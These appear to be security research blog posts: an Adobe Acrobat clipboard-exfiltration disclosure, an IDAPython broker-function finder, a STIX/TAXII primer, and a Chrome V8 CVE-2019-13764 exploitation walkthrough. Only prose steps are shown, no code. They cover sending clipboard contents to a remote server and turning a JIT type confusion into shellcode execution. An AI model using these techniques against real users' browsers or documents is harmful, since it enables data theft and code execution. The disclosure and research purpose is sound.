app.addMenuItem() : Add a new Menu Item with custom JS code

 

It’s always documented somewhere in code…

In their official API reference, Adobe only documented the menu items that can be executed from doc-level. Here’s a snippet of the “documented” menu items from their documentation:

Of course, this is not the complete list. Most of the juicy ones require a restrictions bypass chained with them. So, let’s dig into the list from console:

There’s quite a lot.

One specific menu item that caught my eye was: “ImageConversion:Clipboard”. This one does not run from the doc-level and requires a restrictions bypass chained with it. This Menu Item is not documented and, while testing – turns out that through that menu item, one can gain access to the clipboard through JavaScript. Sounds insane right? Well here’s how it works:

First, the menu item uses the ImageConversion plugin. The ImageConversion plugin is responsible for converting various image formats to PDF documents. When the menu item “ImageConversion:Clipboard” is executed, the plugin is loaded, clipboard contents are accessed and a new PDF file is created using the clipboard content. Yes, all this can be done with a single JavaScript function call. We were only able to use this menu item with text content in the clipboard.

 

Sounds great, how can we exploit this?

Easy, create a PDF that does the following:

1.      Grabs the clipboard content and creates a new PDF file

2.      Accesses the newly created PDF file with the clipboard content

3.      Grabs the content from the PDF document

4.      Sends the content to a remote server

5.      Closes the newly created document

 

How does that look in JavaScript?

Of course, this POC snippet is for demo purposes and was presented as such to Adobe. No API restrictions bypass was chained with it.

No Security Implications...move on. 

We submitted this “issue” to Adobe hoping that they’ll get it fixed.

To our disappointment, their argument was that this works as designed and there are no security implications since this only works from restricted context. They also added that they would consider again if there’s a JavaScript API restrictions bypass.

What that technically means is that they overly trust the application’s security architecture. Also, it’s unclear whether or not if a chain was submitted they’d address this issue or just the API bypass.

To counter Adobe’s argument, we referenced a similar issue that was reported by ZDI and fixed in 2020. Adobe stated:

Of course, we went back and manually verified if it did indeed trigger from doc-level. Our testing showed otherwise – the menu item did not work (at least from our testing) from doc-level and required a restrictions bypass. It’s unclear whether or not there’s a specific way to force that menu item to run from doc-level.

 

Do JavaScript API restrictions bypasses exist?

They did, they do and will probably always be around. Here’s a demo of this clipboard issue chained with one. Note that this is only a demo and can definitely be refined to be more stealthy. We cannot confirm nor deny that this chain uses a bypass that works on the latest version:

Disclosure Timeline:

Conclusion

It’s unfortunate that Adobe decided not to fix this issue although they have in the past fixed issues in restricted APIs thus requiring a JS restrictions bypass chained. There’s a reason why “chains” exist.

This makes me wonder whether or not they will fix other issues that require a JS restrictions bypass like memory corruptions in restricted JS API’s? Or should we expect bugs that require an ASLR bypass not to be fixed unless an ASLR bypass is provided?

Adobe closed this case as “Informative” which means dropping similar 0days for educational and informational purposes :)

 

Until next time…

 

References

http://i.blackhat.com/eu-19/Thursday/eu-19-Hariri-Tackling-Privilege-Escalation-With-Offense-And-Defense.pdf

http://dev.datalogics.com/cookbook/document/AcrobatDC_js_api_reference.pdf

https://www.zerodayinitiative.com/advisories/ZDI-20-990/

 

IDAPython Scripting: Hunting Adobe's Broker Functions

Overview

Recently, many vulnerabilities were fixed by Adobe. Almost all of those vulnerabilities fix issues in the renderer. It’s quite rare to find a bug fixed in Reader’s broker.

Our R&D Director decided to embark on an adventure to understand really what’s going on. What’s behind this beast? is it that tough to escape Adobe’s sandbox?

He spent a couple of weeks reading, reversing and writing various toolset. He spent a good chunk of his time in IDAPro finding broker functions, marking them, renaming them and analyzing their parameters.

Back then I finished working on another project and innocently asked if he needs any help. Until this day, I’m still questioning myself whether or not I should have even asked ;). He turned and said: “Sure I think it would be nice to have an IDAPython script that automatically finds all those damn broker functions”. IDAPython, what’s that? Coffee?

First, IDA Pro is one of the most commonly used reverse engineering tools. It exposes an API that allows automating reversing tasks inside the application. As the name implies, IDAPython is used to automate reverse engineering tasks in python.

I did eventually agree to take on this challenge - of course without knowing what I was getting myself into.

Throughout this blog post, I will talk about my IDAPython journey. Especially with the task that I signed myself to, writing an IDAPython script that automatically finds and flags broker functions in Acrord32.exe

Adobe Acrobat Sandbox 101

When Acrobat Reader is launched, two processes are usually created. A Broker process and a sandboxed child process. The child process is spawned with low integrity. The Broker process and the sandboxed process communicate over IPC  (Inter-Process Communication). The whole sandbox is based on Chromium’s legacy IPC Sandbox.

The broker exposes certain functions that the sandboxed process can execute. Each function is called a tag and has a bunch of parameters. The whole architecture is well documented and can be found in the references below.

Now the question is, how can we find those broker functions? How can we enumerate the parameters? Here comes the role of IDAPython.

Now let's get our hands dirty...

 

Scripting in IDAPython

After some research and reversing, I deduced that all the information we need is contained within the '.rdata' section. Each function with its tag and parameters have a fixed pattern which is 52 bytes followed by a function offset, and looks as follows:

Some bytes were bundled and defined as ‘'xmmword'’ instructions due to IDA’s  analysis.

In order to fix this, we undefine those instructions by right-clicking each one and selecting the  undefine option in ida. Ummm... but what if there are hundreds of them? Wouldn't that take hours? Yup, that’s definitely not efficient. Solution? You guessed it, IDAPython!

The next thing we need to do is convert all those bytes (db) to dwords  (dd) and then create an array to group them together so we can get something that looks like the following:

At 0x001DE880 we have the function tag which is 41h. At 0x001DE884 we have the three parameters 2 dup(1) (two parameters of type 1) and a third parameter of type 2. Finally, at 0x001DE8D4 we have the offset of the function.

Since now we know what to look for and how to do it, let’s write a pseudo-process to accomplish this task for all the broker functions:

1. Scan the '.rdata' section and undefine all unnecessary instructions (xmmword)

2. Start scanning the pattern of the tag, parameters, and offset

3. Convert the bytes to dwords

4. Convert the dwords to an array

5. Find all the functions going forward

5. Display the results

 

The Implementation

First, we start off by writing a function that undefines xmmword instructions:

As all our work will be in '.rdata' section, we utilize the 'get_segm_by_name' function from the Idaapi package, which returns the address of any segment you pass as a parameter. Using the startEA and endEA properties of the function, we determined the start and the end addresses of the '.rdata' section.

We scan the '.rdata' section using GetDisasm() function to check for any xmmword we stumble across.  Once we do encounter an xmmword then we apply the do_unknown() function which undefines them.

The itemSize() function is used to move and proceed with one instruction at a time.

Next, we check if there are 52 bytes followed by a function offset containing the string 'sub', then pass the starting address of that pattern to the next function, convertDword().

This convertDword function takes the start address of the pattern and converts each 4 bytes to dwords then creates an array out of those dwords.

Having executed the previous function on the entire '.rdata' section, we end up with something similar to the following:

Next, we grab the functions and write them into a file and put them into a new window in IDAPro.

As for the argument types? Sure, here’s what each match to:

The next step is to scan the data section and convert all arguments type numbers to the actual type name to be displayed later.

As I mentioned before, there’s a tag of type dword followed by the parameters which always includes dup() and then followed by a function offset that always contains 'sub' string. We split the parameters and pass the list returned to remove_chars() function which removes unnecessary characters and spaces, lastly we pass the list to remove_dups() function to remove the dup() keyword and replace it with the number of parameters (will be explained in a bit).

Before explaining this function, lets explain what does dup(#) means, if we have for example “2 dup(3)” this means we have 2 parameters of type 3, if we have a number with dup(0) that means we can remove that parameter because it’s an invalid type as we saw earlier in the table we have.

That said, this function is straight forward, we iterate over the list containing all the parameters. We then remove all spaces and characters like 'dd' from the instruction. If there is a dup(0) in the list we just pop that item from the list, and return an array with only valid parameters. so now the next step is to replace dup() with how many numbers in front of it. For example if we have 5 dup (2) that would result 2, 2, 2, 2, 2 in the array.

We iterate over the list using regex to extract the number between dup() parenthesis and append the number extracted based on the number before the dup() just like the example we discussed earlier. After this, we will have a list of numbers only which we can iterate over and replace each parameter type number to its corresponded type.

Finally, the results are written to a file. The results are also written to a new subview in IDA.

Conclusion

It was quite a ride. Maybe I should have known what I was getting myself into. Regardless, the end result was great. It’s worth noting that I ended up sending the directory many output iterations with wrong results – but hey, I was able to get it right in the end!

Finally, you’d never understand the power of IDAPython until you actually write IDAPython scripts. It definitely makes life much easier when it comes to automating RE tasks in IDAPro.

 

Until next time..

References

Introduction to: Sharing Cyber Threat Intelligence using STIX and TAXII (Part 2)

In PART 1 (Link to Part 1) of this blog post, we went over threat intelligence, from concepts and benefits to challenges and solutions. Two great solutions present themselves which are STIX and TAXII and this is what this blog post is all about.

 

So ..

What are STIX and TAXII?

•      What is STIX?
Structured Threat Information Expression (STIX™) is a language for expressing cyber threat and observable information.

•      Usage:
It is used to describe cyber threat intelligence (CTI), such as TTP, Adversary information and indicators.

•      Versions:
Latest Version is STIX 2.1, It uses JSON format to describe Cyber Threat Intelligence.
Older versions STIX 1.X, used XML format.

•      STIX Features:

  1. Provides a structure that puts together a diverse set of cyber threat information, including:
    a) Cyber Observables
    b) Indicators
    c) Incidents
    d) Adversary Tactics, Techniques, and Procedures
    e) Courses of Action
    f) Threat Actors

  2. Graph based: a tool is provided to convert STIX format to graph, to help in the analysis process.

  3. Improve capabilities such as:
    a) Collaborative threat analysis
    b) Automated threat exchange
    c) Automated detection and response

Example for a CTI in STIX Format:

As you can see, it is written in JSON format. There are variables names which have values, we will explain it in details later, this sample is just to get familiar with the STIX format.

•      What is TAXII?

Trusted Automated Exchange of Intelligence Information, an application layer protocol that runs over HTTPS, used for sharing cyber threat intelligence between trusted partners. TAXII defines API’s (a set of services and message exchanges) and a set of requirements for TAXII Clients and Servers. There are open-source implementations in multiple programming languages.

History of STIX and TAXII:

A brief history of STIX / TAXII standards is displayed on the timeline figure below.

History of STIX / TAXII

STIX data model:

We will see how this language models the threat information, meaning: how it represents the threat data. It models the data in three main objects:

1. STIX Domain Objects (SDO):

Higher Level Intelligence Objects. Each of these objects corresponds to a concept commonly used in CTI.

STIX Domain Objects:

•      Attack pattern •      Indicator •      Tool

•      Campaign •      Infrastructure •      Vulnerability

•      Course of Action •      Intrusion set •      Malware

•      Grouping •      Location •      Malware Analysis

•      Identity •      Report •      Note

•      Incident •      Threat Actor •      Observed Data

•      Opinion

2. STIX Cyber-observable Objects (SCO):

For characterizing host-based and network-based observed information, such as IP address and domain name.

STIX Cyber observable Objects:

•      Artifact •      File •      Process

•      Autonomous System •      IPv4 Address •      Software

•      Directory •      IPv6 Address •      User Account

•      Domain Name •      MAC Address •      Windows Registry Key

•      Email Address •      Mutex •      X.509 Certificate

•      Email Message •      Network Traffic

 

3. STIX Relationship Objects (SRO):

There are two types of relationship objects:
a) Standard relationship:

is a link between STIX Domain Objects (SDOs), STIX Cyber-observable Objects (SCOs), or between an SDO and a SCO that describes the way in which the objects are related.

Standard relationships:

•      Target •      Investigates •      Exfiltrate to

•      Uses •      Remediates •      Owns

•      Indicates •      Located at •      Authored by

•      Mitigates •      Based on •      Downloads

•      Attributed to •      Communicate with •      Drops

•      Variant of •      Consist of •      Exploits

•      Impersonate •      Controls •      Characterizes

•      Delivers •      Has •      AV-analysis of

•      Compromises •      Hosts •      Static analysis of

•      Originate from •      Duplicate of •      Beacons to

•      Derived from •      Dynamic analysis of •      Related to


b) Sighting relationship:

Denotes the belief that something in CTI (malware, threat actor, tool) was seen. Used to track who and what are being targeted, how attacks are carried out, and to track trends in attack behavior, and how many times it was seen. It is used to provide context and more descriptive information.

Example:
Indicator was seen by Haboob company in an organization on public sector in East of Saudi Arabia.

STIX to Graph

Since one of STIX features is that is can be converted to graph, we will see an example showing all STIX objects:

STIX converted to graph

How to write CTI in STIX format:

We will see an example of writing a CTI in STIX format.

  • Writing STIX domain Object: Attack Pattern:

Attack pattern Domain object: contains information about the TTP of an adversary to compromise targets.

We will convert CTI about the TTP of an adversary to a STIX Domain Object Attack Pattern.

Let us assume that the TTP of the adversary is: initial Access using Email Spear phishing.

Before writing the Attack pattern object, let us refer back to our previous example:

As we see from the STIX code example, when writing CTI in STIX format, we have to write in JSON format, and there are variables (black color) that have values (green color), these variables are the properties. Each STIX object has properties. Also, for each STIX object there are common properties that all objects share and specific properties to that object. Some of these properties are required, some are optional. Also, each of these properties accept a defined input type. All STIX properties and their required input are available in the official STIX Standard documentation provided by OASIS organization.

Seeing the properties for Attack Pattern Object from STIX documentation:

We will see now how to write these properties and what input they accept:

  • Common Properties:

Notice how id property is written. UUID here is version 4.

Also notice how the timestamp is written, where "s+" represents 1 or more sub-second values. The brackets denote that sub-second precision is optional, and that if no digits are provided, the decimal place must not be present.

  • Specific Properties:

Notice that some specific properties are required, and some are optional.

  • Relationship objects:

These are the relationships explicitly defined between the Attack Pattern object and other STIX Objects.

Notice that there are relationships from this object to other objects which is forward relationships, and from other objects to this object which are Reverse relationships.

Also, STIX also allows relationships from any SDO or SCO to any SDO or SCO that have not been defined in this specification, by using common relationships. Meaning, if you couldn’t use the mentioned forward and reverse relationship to relate an attack pattern to another object, you can use common relationships to relate them to each other.

After seeing the properties, back to our example. We will write a spear phishing attack pattern with a relationship to Threat actor X in STIX:

As we see the code is written for two domain objects which are “Attack Pattern” and “Threat Actor”, and a relationship object standard type which is “uses”. As we saw the specification and properties for Attack Pattern domain object so that we were able to write it in the correct format, we also had to go to STIX documentation to see the specification and properties of Threat Actor domain object, to write it in the correct format.

If we use the provided resource that converts STIX to graph, we will see this graph:

result after converting STIX to graph

The tool to convert STIX to graph can be found here:
https://oasis-open.github.io/cti-stix-visualization/

This was an example of how to write STIX CTI with two domain objects and one relationship object. To write about more objects and provide more details, we must refer back to the STIX standard documentation, to know the properties for each object, so that we write it adhering to the required specification and format.

Resources:

More resources to be used with STIX standard can be found here:
https://oasis-open.github.io/cti-documentation/resources.html

STIX transportation through TAXII:

If the CTI is transferred to STIX, now it is ready to be shared. To share it, we will use TAXII.

TAXII is the protocol that runs over HTTPS which is used to exchange cyber threat intelligence. It has specifications that govern this exchange. Also, it has two sharing models. We will mention those specifications and models.

TAXII Sharing Models:

It has two sharing models:
1- Collections:
It is a relationship between a producer and a consumer. Consists of a TAXII server and a TAXII client. The TAXII server hosts a repository of CTI in STIX format, that can be requested from a TAXII client. The TAXII client will be only able to request CTI, and not able to add CTI to the server.
2- Channels:
It is a relationship between a publisher and a subscriber. Consists of a TAXII server and TAXII clients. The TAXII server will host a repository of CTI, that can be requested from AND added to by a TAXII client. The TAXII client can request and add CTI to the TAXII server. The published CTI from one TAXII client to the TAXII server, will be pushed and shared through the TAXII server, to other TAXII clients, that are subscribed to this TAXII server.

TAXII sharing models: Collections and Channels

The Specification of Channels sharing model is yet to be defined by OASIS in TAXII standard documentation. Due to this reason, we will mention the specification of Collection sharing model only.

Collections sharing model specifications:

We have a TAXII server and a TAXII client in this sharing model, that need to communicate through HTTPS (HTTP over TLS). There are some specifications defined that must be met in this communication. These specifications are:
1- Media type:
it is shown in the following table:

There is a version parameter that can be used with media type, it is shown in the following table:

The media type specification must be met for the HTTP request and response.

2- Discovery:

There are two discovery methods for the TAXII server, either by network using DNS SRV record, or by a Discovery endpoint. The first method is using a DNS SRV record that identifies the TAXII Server hosting this service in the network. The second method is to make an HTTP request to a defined URL that will enable a client to be authenticated and authorized. Endpoint term is used here to refer to a specific URL for discovery of the TAXII server.

The discovery URL must be named “taxii2”.

3- Authentication and Authorization:

To access any of the API’s on the TAXII servers, it requires authentication. The Authentication and authorization are done using HTTP basic authentication.

4- API Roots:

It is a group of collections. Each API root has a specific URL to be requested from. Organizing the collections into API Roots allows for a division of content and access control.

5- Collections:

A repository of CTI objects. Each collection has a specific URL to be requested from.

6- Objects:

The available CTI to be retrieved by the TAXII client. Each object has a specific URL to be requested from.

The following table shows example of URLs of the mentioned specifications.

An important note is that as you see from the tables, all requests end with a slash “/”. This is also a TAXII specification.

TAXII request and response examples:

  • Discovery:

GET Request

GET /taxii2/ HTTP/1.1
Host: haboob.com
Accept: application/taxii+json;version=2.1

GET Response

  • API Roots:

GET Request

GET /api1/ HTTP/1.1
Host: haboob.com
Accept: application/taxii+json;version=2.1

GET Response

  • Collections:

GET Request
GET /api1/collections/ HTTP/1.1   

GET Response

  • Objects:

GET Request
GET /api1/collections/91a7b528-80eb-42ed-a74d-c6fbd5a26116/objects/ HTTP/1.1
Host: haboob.com
Accept: application/taxii+json;version=2.1

GET Response

Note: API roots, Collections and objects are all saved in an internal database on the TAXII server. The database type is different depending on the implementation of the TAXII server, and the type is left to be chosen by the developer.

Resources:

There is an implementation of a TAXII server and client provided by OASIS. It can be found here:
TAXII server:
https://github.com/oasis-open/cti-taxii-server

TAXII client:
https://github.com/oasis-open/cti-taxii-client

 

Conclusion:

In this blog we have defined what CTI is and why it needs to be shared with alike organizations. We also briefly went over the steps of a CTI cycle. After that we saw the issues faced by organizations to share CTI, which resulted in the creation of STIX and TAXII standards. Then, we have defined what is STIX and TAXII standards and how to use them to share CTI.

 

 

References:

1.STIX 2.1 Documentation
https://docs.oasis-open.org/cti/stix/v2.1/os/stix-v2.1-os.pdf

2.TAXII 2.1 Documentation:
https://docs.oasis-open.org/cti/taxii/v2.1/os/taxii-v2.1-os.pdf

3. Cti-traning : STIX2-TAXII2 Workshop
https://github.com/oasis-open/cti-training/blob/master/june-2018-FIRST-half-day-training/FIRST%20STIX2-TAXII2%20Workshop%20June%202018.pdf

4.CTI documentation:
https://oasis-open.github.io/cti-documentation/

5.OASIS:
https://www.oasis-open.org/

 

CVE-2019-13764: From Root-Cause to BASH

Overview:

Over the past couple of weeks, some of the team members were tasked with researching browsers. Since Chrome is the most popular browser nowadays, the team decided to jump into Chrome and Chrome exploitation research.

There are quite a lot of resources that can get anyone started with Chrome vulnerability research. In our experience, the best way is to get our hands dirty and jump directly into root-causing a vulnerability followed by an attempt to write an exploit for it.

There has been a lot of noise about JIT bugs, due to the sheer amount of bugs found exploited in the wild. They’re definitely having their fair share nowadays due to the massive complexity of JIT which in turn comes with a price. That said, we decided to go ahead and research JIT bugs and JIT exploitation in general.

So, what’s the best way to get started? Pick a CVE and tear it apart. Root-cause and exploit it. There’s a lot out there, one in particular that we decided to pursue was CVE-2019-13764.

The bug is a Type-Confusion in V8 according to Google’s bulletin. The root-cause of the vulnerability was unclear from the initial report. Besides that, there was a reference that a threat actor was trying to exploit it in the wild, which made it more interesting for us to pursue.

 

Root Cause:

With the lack of public information about this vulnerability, the best way to start understanding this vulnerability is by checking the patch commits. Two modifications were made in order to fix this bug, the modifications were made in the following files:

  • Src/compiler/graph-reducer.cc

  • Src/compiler/typer.cc

Armed with that, we started analyzing the changes made in those files. During the analysis of the typer source, we noticed that at line typer.cc:855 the bug occurs when the induction variable sum -Infinity with +infinity this will result (NaN). Compiler infers (-Infinity; +Infinity) as the induction variable type, while the actual value after the summation will be NaN.

Next step was to dynamically look into the bug under the microscope.


Triggering the Bug:

The bug can be triggered using the following PoC:

Exploitation:

After a lot of reading and researching about JIT bugs and JIT exploitation, it seemed that exploiting JIT vulnerabilities follow the same methodology:

  1. Trigger the bug and the integer miscalculation to gain R/W using a corrupted array

  2. Create addrof and fakeobj

  3. Getting arbitrary read and write using addrof and fakeobj

  4. Create RWX page using WebAssembly

  5. Leak the address of the RWX page

  6. Copy shellcode to RWX page

  7. Execute shellcode by calling a Wasm instance method.

Step 1: Triggering the bug and the integer miscalculation.

The initial trigger was modified to perform a series of operations aimed to transform the type mismatch into an integer miscalculation. We then used the result from the integer miscalculation to create a corrupted array in order to achieve R/W access.

Step 2: Create addrof and fakeobj functions

The addrof function is a helper function that takes an object as an argument and returns the address in memory of that object. The addrof function uses the corrupted array in order to achieve the arbitrary read.

Using the corrupted array, we change the value from the object map to a float array map:

After storing the address, we then restore the map back to its original value:

The fakeobj function is a helper function that takes an address and uses it to return a fake object. We need to use a float array and store the given memory address at index 0:

Afterwards, the float array map is changed to an array of objects:

Finally, store the value then return the map back to its original value:

Step 3: Getting arbitrary read and write using addrof and fakeobj

To get arbitrary read we need to create a float array and set index 0 to a float array map as follows:

Now we need to position a fakeobj right on top of our new crafted array with a float array map:

Change the elements pointer using our crafted array to read_addr-0x10:

Index 0 will then return the value at read_addr.

To get arbitrary write we will use arb_rw_arr array that we declared before, then we will place a fakeobj right on top of our crafted array with a float array map:

Then, change the elements pointer using our crafted array to write_addr-0x10:

Finally, write at index 0 as a floating-point value:

Step 4: Create RWX page using WebAssembly:

Step 5: Copy the shellcode to the RWX page:

First, we need to locate the RWX page address using the addrof function:

Then, we create and copy the shellcode:

Finally, we copy our shellcode to the RWX page

Step 6: Execute shellcode by calling a Wasm instance method.

The shellcode execution is achieved by calling a Wasm function.

Conclusion:

JIT bugs are quite fun to exploit. Lucky enough, Wasm is of big help and makes the exploitation process a lot more pleasant because of the RWX pages created.

Most of the JIT bugs can be exploited in the same manner using the same methodology. Because of the increase use of Wasm in JIT exploitation, it is expected that some sort of mitigation or hardening against these type of exploitation techniques will most likely occur.

We hope that you enjoyed this technical piece. Stay tuned for more browser exploitation blogs in the future.

The full exploit can be found in our GitHub.


References:

https://github.com/HaboobLab/CVE-2019-13764

https://googleprojectzero.blogspot.com/2021/01/in-wild-series-chrome-infinity-bug.html

https://abiondo.me/2019/01/02/exploiting-math-expm1-v8/

https://faraz.faith/2019-12-13-starctf-oob-v8-indepth/


❌